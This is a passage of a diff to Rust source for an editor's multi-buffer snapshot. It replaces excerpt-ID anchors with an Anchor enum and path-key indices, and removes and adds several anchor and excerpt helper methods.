loop { let excerpt = cursor.excerpt()?; + let buffer_snapshot = excerpt.buffer_snapshot(self); // If we have already retrieved metadata for this excerpt, continue to use it. 
let metadata_iter = if let Some((_, metadata)) = current_excerpt_metadata .as_mut() - .filter(|(excerpt_id, _)| *excerpt_id == excerpt.id) + .filter(|(excerpt_info, _)| excerpt_info == &excerpt.range) { Some(metadata) } @@ -4493,16 +3836,20 @@ impl MultiBufferSnapshot { .range .context .end - .summary::(&excerpt.buffer); - if let Some((end_excerpt_id, end_buffer_offset)) = range_end - && excerpt.id == end_excerpt_id + .summary::(&buffer_snapshot); + if let Some((end_excerpt, end_buffer_offset)) = &range_end + && &excerpt.range == end_excerpt { - buffer_end = buffer_end.min(end_buffer_offset); + buffer_end = buffer_end.min(*end_buffer_offset); } - get_buffer_metadata(&excerpt.buffer, buffer_start..buffer_end).map(|iterator| { - &mut current_excerpt_metadata.insert((excerpt.id, iterator)).1 - }) + get_buffer_metadata(&buffer_snapshot, buffer_start..buffer_end).map( + |iterator| { + &mut current_excerpt_metadata + .insert((excerpt.range.clone(), iterator)) + .1 + }, + ) }; // Visit each metadata item. @@ -4566,8 +3913,8 @@ impl MultiBufferSnapshot { // When there are no more metadata items for this excerpt, move to the next excerpt. 
else { current_excerpt_metadata.take(); - if let Some((end_excerpt_id, _)) = range_end - && excerpt.id == end_excerpt_id + if let Some((end_excerpt, _)) = &range_end + && &excerpt.range == end_excerpt { return None; } @@ -4590,14 +3937,16 @@ impl MultiBufferSnapshot { cursor.seek_to_start_of_current_excerpt(); let excerpt = cursor.excerpt()?; - let excerpt_start = excerpt.range.context.start.to_offset(&excerpt.buffer); - let excerpt_end = excerpt.range.context.end.to_offset(&excerpt.buffer); - let current_position = self - .anchor_before(offset) - .text_anchor - .to_offset(&excerpt.buffer); + let buffer = excerpt.buffer_snapshot(self); + let excerpt_start = excerpt.range.context.start.to_offset(buffer); + let excerpt_end = excerpt.range.context.end.to_offset(buffer); + let current_position = match self.anchor_before(offset) { + Anchor::Min => 0, + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor.text_anchor().to_offset(buffer), + Anchor::Max => unreachable!(), + }; - if let Some(diff) = self.diffs.get(&excerpt.buffer_id) { + if let Some(diff) = self.diff_state(excerpt.buffer_id) { if let Some(main_buffer) = &diff.main_buffer { for hunk in diff .hunks_intersecting_base_text_range_rev(excerpt_start..excerpt_end, main_buffer) @@ -4605,24 +3954,22 @@ impl MultiBufferSnapshot { if hunk.diff_base_byte_range.end >= current_position { continue; } - let hunk_start = excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start); - let start = Anchor::in_buffer(excerpt.id, hunk_start).to_point(self); + let hunk_start = buffer.anchor_after(hunk.diff_base_byte_range.start); + let start = + Anchor::in_buffer(excerpt.path_key_index, hunk_start).to_point(self); return Some(MultiBufferRow(start.row)); } } else { - let excerpt_end = excerpt - .buffer - .anchor_before(excerpt_end.min(current_position)); - for hunk in diff.hunks_intersecting_range_rev( - excerpt.range.context.start..excerpt_end, - &excerpt.buffer, - ) { - let hunk_end = 
hunk.buffer_range.end.to_offset(&excerpt.buffer); + let excerpt_end = buffer.anchor_before(excerpt_end.min(current_position)); + for hunk in diff + .hunks_intersecting_range_rev(excerpt.range.context.start..excerpt_end, buffer) + { + let hunk_end = hunk.buffer_range.end.to_offset(buffer); if hunk_end >= current_position { continue; } - let start = - Anchor::in_buffer(excerpt.id, hunk.buffer_range.start).to_point(self); + let start = Anchor::in_buffer(excerpt.path_key_index, hunk.buffer_range.start) + .to_point(self); return Some(MultiBufferRow(start.row)); } } @@ -4631,38 +3978,40 @@ impl MultiBufferSnapshot { loop { cursor.prev_excerpt(); let excerpt = cursor.excerpt()?; + let buffer = excerpt.buffer_snapshot(self); - let Some(diff) = self.diffs.get(&excerpt.buffer_id) else { + let Some(diff) = self.diff_state(excerpt.buffer_id) else { continue; }; if let Some(main_buffer) = &diff.main_buffer { let Some(hunk) = diff .hunks_intersecting_base_text_range_rev( - excerpt.range.context.to_offset(&excerpt.buffer), + excerpt.range.context.to_offset(buffer), main_buffer, ) .next() else { continue; }; - let hunk_start = excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start); - let start = Anchor::in_buffer(excerpt.id, hunk_start).to_point(self); + let hunk_start = buffer.anchor_after(hunk.diff_base_byte_range.start); + let start = Anchor::in_buffer(excerpt.path_key_index, hunk_start).to_point(self); return Some(MultiBufferRow(start.row)); } else { let Some(hunk) = diff - .hunks_intersecting_range_rev(excerpt.range.context.clone(), &excerpt.buffer) + .hunks_intersecting_range_rev(excerpt.range.context.clone(), buffer) .next() else { continue; }; - let start = Anchor::in_buffer(excerpt.id, hunk.buffer_range.start).to_point(self); + let start = Anchor::in_buffer(excerpt.path_key_index, hunk.buffer_range.start) + .to_point(self); return Some(MultiBufferRow(start.row)); } } } pub fn has_diff_hunks(&self) -> bool { - self.diffs.values().any(|diff| !diff.is_empty()) + 
self.diffs.iter().any(|diff| !diff.is_empty()) } pub fn is_inside_word( @@ -4730,16 +4079,17 @@ impl MultiBufferSnapshot { .map(|ch| classifier.kind(ch)) } + pub fn all_buffer_ids(&self) -> impl Iterator + '_ { + self.buffers.iter().map(|(id, _)| *id) + } + pub fn is_singleton(&self) -> bool { self.singleton } - pub fn as_singleton(&self) -> Option<(ExcerptId, BufferId, &BufferSnapshot)> { - if self.singleton { - self.excerpts - .iter() - .next() - .map(|e| (e.id, e.buffer_id, &*e.buffer)) + pub fn as_singleton(&self) -> Option<&BufferSnapshot> { + if self.is_singleton() { + Some(self.excerpts.first()?.buffer_snapshot(&self)) } else { None } @@ -4836,11 +4186,11 @@ impl MultiBufferSnapshot { range: MultiBufferOffset::ZERO..MultiBufferOffset::ZERO, excerpts: self.excerpts.cursor(()), diff_transforms: self.diff_transforms.cursor(()), - diffs: &self.diffs, diff_base_chunks: None, excerpt_chunks: None, buffer_chunk: None, language_aware, + snapshot: self, }; let range = range.start.to_offset(self)..range.end.to_offset(self); chunks.seek(range); @@ -4987,7 +4337,7 @@ impl MultiBufferSnapshot { && !region.is_main_buffer { let main_buffer_position = cursor.main_buffer_position()?; - let buffer_snapshot = &cursor.excerpt()?.buffer; + let buffer_snapshot = cursor.excerpt()?.buffer_snapshot(self); return Some((buffer_snapshot, main_buffer_position)); } else if buffer_offset > BufferOffset(region.buffer.len()) { return None; @@ -4995,10 +4345,7 @@ impl MultiBufferSnapshot { Some((region.buffer, buffer_offset)) } - pub fn point_to_buffer_point( - &self, - point: Point, - ) -> Option<(&BufferSnapshot, Point, ExcerptId)> { + pub fn point_to_buffer_point(&self, point: Point) -> Option<(&BufferSnapshot, Point)> { let mut cursor = self.cursor::(); cursor.seek(&point); let region = cursor.region()?; @@ -5009,11 +4356,14 @@ impl MultiBufferSnapshot { && region.has_trailing_newline && !region.is_main_buffer { - return Some((&excerpt.buffer, cursor.main_buffer_position()?, 
excerpt.id)); + return Some(( + &excerpt.buffer_snapshot(self), + cursor.main_buffer_position()?, + )); } else if buffer_point > region.buffer.max_point() { return None; } - Some((region.buffer, buffer_point, excerpt.id)) + Some((region.buffer, buffer_point)) } pub fn suggested_indents( @@ -5174,6 +4524,11 @@ impl MultiBufferSnapshot { } } + pub fn line_len_utf16(&self, row: MultiBufferRow) -> u32 { + self.clip_point_utf16(Unclipped(PointUtf16::new(row.0, u32::MAX)), Bias::Left) + .column + } + pub fn buffer_line_for_row( &self, row: MultiBufferRow, @@ -5240,7 +4595,8 @@ impl MultiBufferSnapshot { } => { let buffer_start = base_text_byte_range.start + start_overshoot; let mut buffer_end = base_text_byte_range.start + end_overshoot; - let Some(base_text) = self.diffs.get(buffer_id).map(|diff| diff.base_text()) else { + let Some(base_text) = self.diff_state(*buffer_id).map(|diff| diff.base_text()) + else { panic!("{:?} is in non-existent deleted hunk", range.start) }; @@ -5292,7 +4648,8 @@ impl MultiBufferSnapshot { .. 
} => { let buffer_end = base_text_byte_range.start + overshoot; - let Some(base_text) = self.diffs.get(buffer_id).map(|diff| diff.base_text()) else { + let Some(base_text) = self.diff_state(*buffer_id).map(|diff| diff.base_text()) + else { panic!("{:?} is in non-existent deleted hunk", range.end) }; @@ -5323,21 +4680,20 @@ impl MultiBufferSnapshot { let mut cursor = self.excerpts.cursor::(()); cursor.seek(&range.start, Bias::Right); if let Some(excerpt) = cursor.item() { + let buffer_snapshot = excerpt.buffer_snapshot(self); let mut end_before_newline = cursor.end(); if excerpt.has_trailing_newline { end_before_newline -= 1; } - let excerpt_start = excerpt.range.context.start.to_offset(&excerpt.buffer); + let excerpt_start = excerpt.range.context.start.to_offset(&buffer_snapshot); let start_in_excerpt = excerpt_start + (range.start - *cursor.start()); let end_in_excerpt = excerpt_start + (cmp::min(end_before_newline, range.end) - *cursor.start()); summary.add_text_dim( - &excerpt - .buffer - .text_summary_for_range::( - start_in_excerpt..end_in_excerpt, - ), + &buffer_snapshot.text_summary_for_range::( + start_in_excerpt..end_in_excerpt, + ), ); if range.end > end_before_newline { @@ -5352,16 +4708,15 @@ impl MultiBufferSnapshot { .summary::<_, ExcerptDimension>(&range.end, Bias::Right) .0; if let Some(excerpt) = cursor.item() { + let buffer_snapshot = excerpt.buffer_snapshot(self); range.end = cmp::max(*cursor.start(), range.end); - let excerpt_start = excerpt.range.context.start.to_offset(&excerpt.buffer); + let excerpt_start = excerpt.range.context.start.to_offset(&buffer_snapshot); let end_in_excerpt = excerpt_start + (range.end - *cursor.start()); summary.add_text_dim( - &excerpt - .buffer - .text_summary_for_range::( - excerpt_start..end_in_excerpt, - ), + &buffer_snapshot.text_summary_for_range::( + excerpt_start..end_in_excerpt, + ), ); } } @@ -5379,38 +4734,42 @@ impl MultiBufferSnapshot { + Add, MBD::TextDimension: Sub + Ord, { - let excerpt_id = 
self.latest_excerpt_id(anchor.excerpt_id); - let locator = self.excerpt_locator_for_id(excerpt_id); - let (start, _, mut item) = self - .excerpts - .find::((), locator, Bias::Left); - let mut start = MBD::from_summary(&start.text); - if item.is_none() && excerpt_id == ExcerptId::max() { - item = self.excerpts.last(); - if let Some(last_summary) = self.excerpts.last_summary() { - start = start - ::from_text_summary(&last_summary.text.into()); + let target = anchor.seek_target(self); + let anchor = match anchor { + Anchor::Min => { + return MBD::default(); } - } + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor, + Anchor::Max => { + return MBD::from_summary(&self.text_summary()); + } + }; + + let (start, _, item) = self + .excerpts + .find::((), &target, Bias::Left); + let start = MBD::from_summary(&start.text); let excerpt_start_position = ExcerptDimension(start); if self.diff_transforms.is_empty() { if let Some(excerpt) = item { - if excerpt.id != excerpt_id && excerpt_id != ExcerptId::max() { + if !excerpt.contains(anchor, self) { return excerpt_start_position.0; } + let buffer_snapshot = excerpt.buffer_snapshot(self); let excerpt_buffer_start = excerpt .range .context .start - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let excerpt_buffer_end = excerpt .range .context .end - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let buffer_summary = anchor - .text_anchor - .summary::(&excerpt.buffer); + .text_anchor() + .summary::(&buffer_snapshot); let summary = cmp::min(excerpt_buffer_end, buffer_summary); let mut position = excerpt_start_position; if summary > excerpt_buffer_start { @@ -5425,48 +4784,47 @@ impl MultiBufferSnapshot { let mut diff_transforms_cursor = self .diff_transforms .cursor::, OutputDimension>>(()); - diff_transforms_cursor.next(); if let Some(excerpt) = item { - if excerpt.id != excerpt_id && excerpt_id != ExcerptId::max() { - return self.resolve_summary_for_min_or_max_anchor( - &Anchor::min(), + if 
!excerpt.contains(anchor, self) { + diff_transforms_cursor.seek(&excerpt_start_position, Bias::Left); + return self.summary_for_excerpt_position_without_hunks( + Bias::Left, excerpt_start_position, &mut diff_transforms_cursor, ); } + let buffer_snapshot = excerpt.buffer_snapshot(self); let excerpt_buffer_start = excerpt .range .context .start - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let excerpt_buffer_end = excerpt .range .context .end - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let buffer_summary = anchor - .text_anchor - .summary::(&excerpt.buffer); + .text_anchor() + .summary::(&buffer_snapshot); let summary = cmp::min(excerpt_buffer_end, buffer_summary); let mut position = excerpt_start_position; if summary > excerpt_buffer_start { position += summary - excerpt_buffer_start; } - if diff_transforms_cursor.start().0 < position { - diff_transforms_cursor.seek_forward(&position, Bias::Left); - } - self.resolve_summary_for_anchor( - &anchor, + diff_transforms_cursor.seek(&position, Bias::Left); + self.summary_for_anchor_with_excerpt_position( + *anchor, position, &mut diff_transforms_cursor, - &excerpt.buffer, + &buffer_snapshot, ) } else { - diff_transforms_cursor.seek_forward(&excerpt_start_position, Bias::Left); - self.resolve_summary_for_min_or_max_anchor( - &Anchor::max(), + diff_transforms_cursor.seek(&excerpt_start_position, Bias::Left); + self.summary_for_excerpt_position_without_hunks( + Bias::Right, excerpt_start_position, &mut diff_transforms_cursor, ) @@ -5477,9 +4835,9 @@ impl MultiBufferSnapshot { /// Maps an anchor's excerpt-space position to its output-space position by /// walking the diff transforms. The cursor is shared across consecutive /// calls, so it may already be partway through the transform list. 
- fn resolve_summary_for_anchor( + fn summary_for_anchor_with_excerpt_position( &self, - anchor: &Anchor, + anchor: ExcerptAnchor, excerpt_position: ExcerptDimension, diff_transforms: &mut Cursor< DiffTransform, @@ -5510,9 +4868,9 @@ impl MultiBufferSnapshot { hunk_info, .. }) => { - if let Some(diff_base_anchor) = &anchor.diff_base_anchor + if let Some(diff_base_anchor) = anchor.diff_base_anchor && let Some(base_text) = - self.diffs.get(buffer_id).map(|diff| diff.base_text()) + self.diff_state(*buffer_id).map(|diff| diff.base_text()) && diff_base_anchor.is_valid(&base_text) { // The anchor carries a diff-base position — resolve it @@ -5534,7 +4892,7 @@ impl MultiBufferSnapshot { } } else if at_transform_end && anchor - .text_anchor + .text_anchor() .cmp(&hunk_info.hunk_start_anchor, excerpt_buffer) .is_gt() { @@ -5569,9 +4927,9 @@ impl MultiBufferSnapshot { } /// Like `resolve_summary_for_anchor` but optimized for min/max anchors. - fn resolve_summary_for_min_or_max_anchor( + fn summary_for_excerpt_position_without_hunks( &self, - anchor: &Anchor, + bias: Bias, excerpt_position: ExcerptDimension, diff_transforms: &mut Cursor< DiffTransform, @@ -5588,7 +4946,7 @@ impl MultiBufferSnapshot { // A right-biased anchor at a transform boundary belongs to the // *next* transform, so advance past the current one. 
- if anchor.text_anchor.bias == Bias::Right && at_transform_end { + if bias == Bias::Right && at_transform_end { diff_transforms.next(); continue; } @@ -5604,27 +4962,27 @@ impl MultiBufferSnapshot { } fn excerpt_offset_for_anchor(&self, anchor: &Anchor) -> ExcerptOffset { - let mut cursor = self - .excerpts - .cursor::, ExcerptOffset>>(()); - let locator = self.excerpt_locator_for_id(anchor.excerpt_id); + let anchor = match anchor { + Anchor::Min => return ExcerptOffset::default(), + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor, + Anchor::Max => return self.excerpts.summary().len(), + }; + let mut cursor = self.excerpts.cursor::(()); + let target = anchor.seek_target(self); - cursor.seek(&Some(locator), Bias::Left); - if cursor.item().is_none() && anchor.excerpt_id == ExcerptId::max() { - cursor.prev(); - } + cursor.seek(&target, Bias::Left); - let mut position = cursor.start().1; + let mut position = cursor.start().len(); if let Some(excerpt) = cursor.item() - && (excerpt.id == anchor.excerpt_id || anchor.excerpt_id == ExcerptId::max()) + && excerpt.contains(anchor, self) { - let excerpt_buffer_start = excerpt - .buffer - .offset_for_anchor(&excerpt.range.context.start); - let excerpt_buffer_end = excerpt.buffer.offset_for_anchor(&excerpt.range.context.end); + let buffer_snapshot = excerpt.buffer_snapshot(self); + let excerpt_buffer_start = + buffer_snapshot.offset_for_anchor(&excerpt.range.context.start); + let excerpt_buffer_end = buffer_snapshot.offset_for_anchor(&excerpt.range.context.end); let buffer_position = cmp::min( excerpt_buffer_end, - excerpt.buffer.offset_for_anchor(&anchor.text_anchor), + buffer_snapshot.offset_for_anchor(&anchor.text_anchor()), ); if buffer_position > excerpt_buffer_start { position += buffer_position - excerpt_buffer_start; @@ -5633,13 +4991,6 @@ impl MultiBufferSnapshot { position } - pub fn latest_excerpt_id(&self, mut excerpt_id: ExcerptId) -> ExcerptId { - while let Some(replacement) = 
self.replaced_excerpts.get(&excerpt_id) { - excerpt_id = *replacement; - } - excerpt_id - } - pub fn summaries_for_anchors<'a, MBD, I>(&'a self, anchors: I) -> Vec where MBD: MultiBufferDimension @@ -5658,43 +5009,57 @@ impl MultiBufferSnapshot { let mut summaries = Vec::new(); while let Some(anchor) = anchors.peek() { - let excerpt_id = self.latest_excerpt_id(anchor.excerpt_id); - - let excerpt_anchors = anchors.peeking_take_while(|anchor| { - self.latest_excerpt_id(anchor.excerpt_id) == excerpt_id - }); + let target = anchor.seek_target(self); + let excerpt_anchor = match anchor { + Anchor::Min => { + summaries.push(MBD::default()); + anchors.next(); + continue; + } + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor, + Anchor::Max => { + summaries.push(MBD::from_summary(&self.text_summary())); + anchors.next(); + continue; + } + }; - let locator = self.excerpt_locator_for_id(excerpt_id); - cursor.seek_forward(locator, Bias::Left); - if cursor.item().is_none() && excerpt_id == ExcerptId::max() { - cursor.prev(); - } + cursor.seek_forward(&target, Bias::Left); let excerpt_start_position = ExcerptDimension(MBD::from_summary(&cursor.start().text)); if let Some(excerpt) = cursor.item() { - if excerpt.id != excerpt_id && excerpt_id != ExcerptId::max() { - let position = self.resolve_summary_for_min_or_max_anchor( - &Anchor::min(), + let buffer_snapshot = excerpt.buffer_snapshot(self); + if !excerpt.contains(&excerpt_anchor, self) { + diff_transforms_cursor.seek_forward(&excerpt_start_position, Bias::Left); + let position = self.summary_for_excerpt_position_without_hunks( + Bias::Left, excerpt_start_position, &mut diff_transforms_cursor, ); - summaries.extend(excerpt_anchors.map(|_| position)); + summaries.push(position); + anchors.next(); continue; } let excerpt_buffer_start = excerpt .range .context .start - .summary::(&excerpt.buffer); + .summary::(buffer_snapshot); let excerpt_buffer_end = excerpt .range .context .end - .summary::(&excerpt.buffer); - for 
(buffer_summary, anchor) in excerpt - .buffer + .summary::(buffer_snapshot); + for (buffer_summary, excerpt_anchor) in buffer_snapshot .summaries_for_anchors_with_payload::( - excerpt_anchors.map(|a| (&a.text_anchor, a)), + std::iter::from_fn(|| { + let excerpt_anchor = anchors.peek()?.excerpt_anchor()?; + if !excerpt.contains(&excerpt_anchor, self) { + return None; + } + anchors.next(); + Some((excerpt_anchor.text_anchor(), excerpt_anchor)) + }), ) { let summary = cmp::min(excerpt_buffer_end, buffer_summary); @@ -5707,21 +5072,22 @@ impl MultiBufferSnapshot { diff_transforms_cursor.seek_forward(&position, Bias::Left); } - summaries.push(self.resolve_summary_for_anchor( - anchor, + summaries.push(self.summary_for_anchor_with_excerpt_position( + excerpt_anchor, position, &mut diff_transforms_cursor, - &excerpt.buffer, + &buffer_snapshot, )); } } else { diff_transforms_cursor.seek_forward(&excerpt_start_position, Bias::Left); - let position = self.resolve_summary_for_min_or_max_anchor( - &Anchor::max(), + let position = self.summary_for_excerpt_position_without_hunks( + Bias::Right, excerpt_start_position, &mut diff_transforms_cursor, ); - summaries.extend(excerpt_anchors.map(|_| position)); + summaries.push(position); + anchors.next(); } } @@ -5768,92 +5134,27 @@ impl MultiBufferSnapshot { }) } - pub fn refresh_anchors<'a, I>(&'a self, anchors: I) -> Vec<(usize, Anchor, bool)> - where - I: 'a + IntoIterator, - { - let mut anchors = anchors.into_iter().enumerate().peekable(); - let mut cursor = self.excerpts.cursor::>(()); - cursor.next(); - - let mut result = Vec::new(); - - while let Some((_, anchor)) = anchors.peek() { - let old_excerpt_id = anchor.excerpt_id; - - // Find the location where this anchor's excerpt should be. 
- let old_locator = self.excerpt_locator_for_id(old_excerpt_id); - cursor.seek_forward(&Some(old_locator), Bias::Left); - - let next_excerpt = cursor.item(); - let prev_excerpt = cursor.prev_item(); - - // Process all of the anchors for this excerpt. - while let Some((anchor_ix, &anchor)) = - anchors.next_if(|(_, anchor)| anchor.excerpt_id == old_excerpt_id) - { - let mut anchor = anchor; - - // Leave min and max anchors unchanged if invalid or - // if the old excerpt still exists at this location - let mut kept_position = next_excerpt - .is_some_and(|e| e.id == old_excerpt_id && e.contains(&anchor)) - || old_excerpt_id == ExcerptId::max() - || old_excerpt_id == ExcerptId::min(); - - // If the old excerpt no longer exists at this location, then attempt to - // find an equivalent position for this anchor in an adjacent excerpt. - if !kept_position { - for excerpt in [next_excerpt, prev_excerpt].iter().filter_map(|e| *e) { - if excerpt.contains(&anchor) { - anchor.excerpt_id = excerpt.id; - kept_position = true; - break; - } - } - } - - // If there's no adjacent excerpt that contains the anchor's position, - // then report that the anchor has lost its position. 
- if !kept_position { - anchor = if let Some(excerpt) = next_excerpt { - let mut text_anchor = excerpt - .range - .context - .start - .bias(anchor.text_anchor.bias, &excerpt.buffer); - if text_anchor - .cmp(&excerpt.range.context.end, &excerpt.buffer) - .is_gt() - { - text_anchor = excerpt.range.context.end; - } - Anchor::in_buffer(excerpt.id, text_anchor) - } else if let Some(excerpt) = prev_excerpt { - let mut text_anchor = excerpt - .range - .context - .end - .bias(anchor.text_anchor.bias, &excerpt.buffer); - if text_anchor - .cmp(&excerpt.range.context.start, &excerpt.buffer) - .is_lt() - { - text_anchor = excerpt.range.context.start; - } - Anchor::in_buffer(excerpt.id, text_anchor) - } else if anchor.text_anchor.bias == Bias::Left { - Anchor::min() - } else { - Anchor::max() - }; + pub fn excerpts_for_buffer( + &self, + buffer_id: BufferId, + ) -> impl Iterator> { + if let Some(buffer_state) = self.buffers.get(&buffer_id) { + let path_key = buffer_state.path_key.clone(); + let mut cursor = self.excerpts.cursor::(()); + cursor.seek_forward(&path_key, Bias::Left); + Some(iter::from_fn(move || { + let excerpt = cursor.item()?; + if excerpt.path_key != path_key { + return None; } - - result.push((anchor_ix, anchor, kept_position)); - } + cursor.next(); + Some(excerpt.range.clone()) + })) + } else { + None } - result.sort_unstable_by(|a, b| a.1.cmp(&b.1, self)); - result + .into_iter() + .flatten() } pub fn anchor_before(&self, position: T) -> Anchor { @@ -5891,7 +5192,7 @@ impl MultiBufferSnapshot { .. 
}) = diff_transforms.item() { - let diff = self.diffs.get(buffer_id).expect("missing diff"); + let diff = self.diff_state(*buffer_id).expect("missing diff"); if offset_in_transform > base_text_byte_range.len() { debug_assert!(*has_trailing_newline); bias = Bias::Right; @@ -5908,132 +5209,158 @@ impl MultiBufferSnapshot { let mut excerpts = self .excerpts - .cursor::>>(()); + .cursor::>(()); excerpts.seek(&excerpt_offset, Bias::Right); if excerpts.item().is_none() && excerpt_offset == excerpts.start().0 && bias == Bias::Left { excerpts.prev(); } if let Some(excerpt) = excerpts.item() { + let buffer_snapshot = excerpt.buffer_snapshot(self); let mut overshoot = excerpt_offset.saturating_sub(excerpts.start().0); if excerpt.has_trailing_newline && excerpt_offset == excerpts.end().0 { overshoot -= 1; bias = Bias::Right; } - let buffer_start = excerpt.range.context.start.to_offset(&excerpt.buffer); - let text_anchor = - excerpt.clip_anchor(excerpt.buffer.anchor_at(buffer_start + overshoot, bias)); - let anchor = Anchor::in_buffer(excerpt.id, text_anchor); - match diff_base_anchor { + let buffer_start = excerpt.range.context.start.to_offset(&buffer_snapshot); + let text_anchor = excerpt.clip_anchor( + buffer_snapshot.anchor_at(buffer_start + overshoot, bias), + self, + ); + let anchor = ExcerptAnchor::in_buffer(excerpt.path_key_index, text_anchor); + let anchor = match diff_base_anchor { Some(diff_base_anchor) => anchor.with_diff_base_anchor(diff_base_anchor), None => anchor, - } + }; + anchor.into() } else if excerpt_offset == ExcerptDimension(MultiBufferOffset::ZERO) && bias == Bias::Left { - Anchor::min() + Anchor::Min } else { - Anchor::max() + Anchor::Max } } - /// Wraps the [`text::Anchor`] in a [`crate::Anchor`] if this multi-buffer is a singleton. 
- pub fn as_singleton_anchor(&self, text_anchor: text::Anchor) -> Option { - let (excerpt, buffer, _) = self.as_singleton()?; - if text_anchor.buffer_id.is_none_or(|id| id == buffer) { - Some(Anchor::in_buffer(excerpt, text_anchor)) - } else { - None - } + /// Lifts a buffer anchor to a multibuffer anchor without checking against excerpt boundaries. Returns `None` if there are no excerpts for the buffer + pub fn anchor_in_buffer(&self, anchor: text::Anchor) -> Option { + let path_key_index = self.path_key_index_for_buffer(anchor.buffer_id)?; + Some(Anchor::in_buffer(path_key_index, anchor)) } - /// Returns an anchor for the given excerpt and text anchor, - /// Returns [`None`] if the excerpt_id is no longer valid or the text anchor range is out of excerpt's bounds. - pub fn anchor_range_in_excerpt( - &self, - excerpt_id: ExcerptId, - text_anchor: Range, - ) -> Option> { - let excerpt = self.excerpt(self.latest_excerpt_id(excerpt_id))?; - - Some( - Self::anchor_in_excerpt_(excerpt, text_anchor.start)? - ..Self::anchor_in_excerpt_(excerpt, text_anchor.end)?, - ) - } + /// Creates a multibuffer anchor for the given buffer anchor, if it is contained in any excerpt. 
+ pub fn anchor_in_excerpt(&self, text_anchor: text::Anchor) -> Option { + for excerpt in { + let this = &self; + let buffer_id = text_anchor.buffer_id; + if let Some(buffer_state) = this.buffers.get(&buffer_id) { + let path_key = buffer_state.path_key.clone(); + let mut cursor = this.excerpts.cursor::(()); + cursor.seek_forward(&path_key, Bias::Left); + Some(iter::from_fn(move || { + let excerpt = cursor.item()?; + if excerpt.path_key != path_key { + return None; + } + cursor.next(); + Some(excerpt) + })) + } else { + None + } + .into_iter() + .flatten() + } { + let buffer_snapshot = excerpt.buffer_snapshot(self); + if excerpt.range.contains(&text_anchor, &buffer_snapshot) { + return Some(Anchor::in_buffer(excerpt.path_key_index, text_anchor)); + } + } - /// Returns an anchor for the given excerpt and text anchor, - /// Returns [`None`] if the excerpt_id is no longer valid or the text anchor range is out of excerpt's bounds. - pub fn anchor_in_excerpt( - &self, - excerpt_id: ExcerptId, - text_anchor: text::Anchor, - ) -> Option { - let excerpt = self.excerpt(self.latest_excerpt_id(excerpt_id))?; - Self::anchor_in_excerpt_(excerpt, text_anchor) + None } - /// Same as [`MultiBuffer::anchor_in_excerpt`], but more efficient than calling it multiple times. - pub fn anchors_in_excerpt( + /// Creates a multibuffer anchor for the given buffer anchor, if it is contained in any excerpt. 
+ pub fn buffer_anchor_range_to_anchor_range( &self, - excerpt_id: ExcerptId, - text_anchors: impl IntoIterator, - ) -> Option>> { - let excerpt = self.excerpt(self.latest_excerpt_id(excerpt_id))?; - Some( - text_anchors - .into_iter() - .map(|text_anchor| Self::anchor_in_excerpt_(excerpt, text_anchor)), - ) - } - - fn anchor_in_excerpt_(excerpt: &Excerpt, text_anchor: text::Anchor) -> Option { - match text_anchor.buffer_id { - Some(buffer_id) if buffer_id == excerpt.buffer_id => (), - Some(_) => return None, - None if text_anchor.is_max() || text_anchor.is_min() => { - return Some(Anchor::in_buffer(excerpt.id, text_anchor)); + text_anchor: Range, + ) -> Option> { + for excerpt in { + let this = &self; + let buffer_id = text_anchor.start.buffer_id; + if let Some(buffer_state) = this.buffers.get(&buffer_id) { + let path_key = buffer_state.path_key.clone(); + let mut cursor = this.excerpts.cursor::(()); + cursor.seek_forward(&path_key, Bias::Left); + Some(iter::from_fn(move || { + let excerpt = cursor.item()?; + if excerpt.path_key != path_key { + return None; + } + cursor.next(); + Some(excerpt) + })) + } else { + None + } + .into_iter() + .flatten() + } { + let buffer_snapshot = excerpt.buffer_snapshot(self); + if excerpt.range.contains(&text_anchor.start, &buffer_snapshot) + && excerpt.range.contains(&text_anchor.end, &buffer_snapshot) + { + return Some(Anchor::range_in_buffer(excerpt.path_key_index, text_anchor)); } - None => return None, - } - - let context = &excerpt.range.context; - if context.start.cmp(&text_anchor, &excerpt.buffer).is_gt() - || context.end.cmp(&text_anchor, &excerpt.buffer).is_lt() - { - return None; } - Some(Anchor::in_buffer(excerpt.id, text_anchor)) - } - - pub fn context_range_for_excerpt(&self, excerpt_id: ExcerptId) -> Option> { - Some(self.excerpt(excerpt_id)?.range.context.clone()) + None } - pub fn excerpt_range_for_excerpt( + /// Returns a buffer anchor and its buffer snapshot for the given anchor, if it is in the multibuffer. 
+ pub fn anchor_to_buffer_anchor( &self, - excerpt_id: ExcerptId, - ) -> Option> { - Some(self.excerpt(excerpt_id)?.range.clone()) + anchor: Anchor, + ) -> Option<(text::Anchor, &BufferSnapshot)> { + match anchor { + Anchor::Min => { + let excerpt = self.excerpts.first()?; + let buffer = excerpt.buffer_snapshot(self); + Some((excerpt.range.context.start, buffer)) + } + Anchor::Excerpt(excerpt_anchor) => { + let buffer = self.buffer_for_id(excerpt_anchor.buffer_id())?; + Some((excerpt_anchor.text_anchor, buffer)) + } + Anchor::Max => { + let excerpt = self.excerpts.last()?; + let buffer = excerpt.buffer_snapshot(self); + Some((excerpt.range.context.end, buffer)) + } + } } pub fn can_resolve(&self, anchor: &Anchor) -> bool { - if anchor.is_min() || anchor.is_max() { + match anchor { // todo(lw): should be `!self.is_empty()` - true - } else if let Some(excerpt) = self.excerpt(anchor.excerpt_id) { - excerpt.buffer.can_resolve(&anchor.text_anchor) - } else { - false + Anchor::Min | Anchor::Max => true, + Anchor::Excerpt(excerpt_anchor) => { + let Some(target) = excerpt_anchor.try_seek_target(self) else { + return false; + }; + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(&target, Bias::Left); + let Some(excerpt) = cursor.item() else { + return false; + }; + excerpt + .buffer_snapshot(self) + .can_resolve(&excerpt_anchor.text_anchor()) + } } } - pub fn excerpts( - &self, - ) -> impl Iterator)> { - self.excerpts - .iter() - .map(|excerpt| (excerpt.id, &*excerpt.buffer, excerpt.range.clone())) + pub fn excerpts(&self) -> impl Iterator> { + self.excerpts.iter().map(|excerpt| excerpt.range.clone()) } fn cursor<'a, MBD, 